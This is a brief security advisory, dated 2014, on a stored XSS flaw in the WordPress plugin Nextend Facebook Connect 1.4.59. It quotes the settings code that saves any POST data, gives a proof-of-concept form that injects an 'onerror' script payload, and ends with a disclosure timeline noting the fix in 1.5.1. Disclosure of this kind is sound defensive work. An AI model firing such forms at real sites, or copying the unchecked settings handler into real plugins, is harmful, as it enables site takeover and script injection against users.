24-11-2014 / Vulnerabilities

Nextend Facebook Connect 1.4.59 XSS

Anyone can change plugin settings.

File: nextend-facebook-connect\nextend-facebook-settings.php

if(isset($_POST['newfb_update_options'])) {
	if($_POST['newfb_update_options'] == 'Y') {
		foreach($_POST AS $k => $v){
			$_POST[$k] = stripslashes($v);
		}
		update_option("nextend_fb_connect", maybe_serialize($_POST));
		$newfb_status = 'update_success';
	}
}

Proof of Concept

<form method="post" action="http://wordpress-instalation">
    <input type="hidden" name="newfb_update_options" value="Y">
    XSS: <textarea name="fb_login_button" rows="10" cols="40">&lt;img src=x onerror=alert(String.fromCharCode(88,83,83))&gt;</textarea>
    <input type="submit" value="Hack!">
</form>

XSS will be visible:

http://wordpress-instalation/wp-login.php

Timeline

  • 16-10-2014: Discovered
  • 06-11-2014: Vendor notified
  • 18-11-2014: Second notification
  • 21-11-2014: Version 1.5.1 released, issue resolved